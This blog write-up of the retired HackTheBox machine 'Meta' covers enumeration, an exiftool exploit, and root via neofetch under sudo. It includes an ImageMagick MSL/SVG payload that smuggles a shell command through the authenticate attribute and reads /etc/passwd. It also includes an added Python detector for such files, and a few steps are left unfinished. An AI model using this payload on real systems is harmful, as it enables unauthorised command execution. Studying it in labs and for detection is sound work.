HackTheBox - Meta

Summary

Meta was a Medium difficulty Linux box created by Nauten. The initial foothold was an RCE in exiftool: uploading a modified image carrying the payload gives us a shell as www-data. Running pspy we see a cron job running a script every minute; uploading a modified SVG gets us a shell as user. Rooting the box was pretty simple: modify XDG_CONFIG_HOME, run neofetch with sudo, and we get a shell as root.

Initial Enumeration

Running nmap, we find:

# Nmap 7.92 scan initiated Sun Jan 23 08:30:42 2022 as: nmap -sC -sV -oN nmap/meta 10.129.140.72
Nmap scan report for meta.htb (10.129.140.72)
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
| 256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_ 256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open http Apache httpd
|_http-title: Did not follow redirect to http://artcorp.htb
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 23 08:31:03 2022 -- 1 IP address (1 host up) scanned in 20.56 seconds

We also see the hostname artcorp.htb in the redirect.

Browsing artcorp.htb, we find three names:

judy
sarah
thomas

gobuster vhost -u http://artcorp.htb -w /opt/tools/SecLists/Discovery/DNS/subdomains-top1million-110000.txt 

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://artcorp.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/tools/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/23 08:37:37 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev01.artcorp.htb (Status: 200) [Size: 247]

Running gobuster gives us a different subdomain.

Opening the subdomain, we see the application MetaView.

Checking that we

Trying it out, it seems to be an image viewer.

Trying with a PHP file, we see that only jpg and png are allowed. Trying multiple ways to bypass this filter, we are unable to get around it.

Focusing on the output, it seems to be exiftool output.

Trying some command injection, we are unable to inject anything.

Let's look for a vulnerability in exiftool, and we find a blog post.

Using the exploit, we are able to get a shell as www-data.

www-data

Running pspy, we see a cron job running as user thomas, which is:

We upload the following modified SVG:
<image authenticate='ff" `echo $(id)> ./0wned`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
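As an added defender's-side example (not from the original writeup), a small Python check that flags the risky constructs in an MSL/SVG document like the one above: the authenticate attribute, shell metacharacters in attribute values, and explicit coder prefixes such as pdf: or msl: in filenames and hrefs. The sample document is reconstructed from the payload above; the function name and the finding wording are my own.

```python
import re
import xml.etree.ElementTree as ET

# Characters that let an attribute value escape into a shell command line
SHELL_META = re.compile(r'[`$;|&]')
# Coder prefixes that make ImageMagick pick a reader/delegate by name rather than by file content
CODER_PREFIX = re.compile(r'^(msl|pdf|ps|ephemeral|url|https?|text|label|mvg):', re.I)

def scan_msl(xml_text):
    """Return (tag, attribute, reason) findings for one MSL/SVG document; an empty list means clean."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [("document", "", "unparseable XML: %s" % exc)]
    findings = []
    for elem in root.iter():
        tag = elem.tag.rsplit('}', 1)[-1]          # strip the XML namespace, if any
        for name, value in elem.attrib.items():
            attr = name.rsplit('}', 1)[-1]
            if attr == "authenticate":
                findings.append((tag, attr, "authenticate value reaches the delegate command line"))
            if SHELL_META.search(value):
                findings.append((tag, attr, "shell metacharacters in attribute value"))
            if attr in ("filename", "href") and CODER_PREFIX.match(value):
                findings.append((tag, attr, "explicit coder prefix " + value.split(':', 1)[0].lower()))
    return findings

# Constructed sample: the MSL document from the writeup above
SAMPLE_MSL = """<image authenticate='ff" `echo $(id)> ./0wned`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>"""

# Constructed benign sample: what a legitimate resize job looks like
BENIGN_MSL = """<image>
<read filename="input.png"/>
<resize geometry="400x400"/>
<write filename="output.png"/>
</image>"""

if __name__ == "__main__":
    for label, doc in (("payload", SAMPLE_MSL), ("benign", BENIGN_MSL)):
        for tag, attr, reason in scan_msl(doc):
            print("%s: <%s %s=...>: %s" % (label, tag, attr, reason))
```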

We can get thomas's SSH key, log in to the box and grab user.txt.

Privilege Escalation

We see that XDG_CONFIG_HOME is kept in the sudo environment, so we can set it to a directory we control, pass it through sudo when running neofetch, and get root.

Rooted the box.

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/meta/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.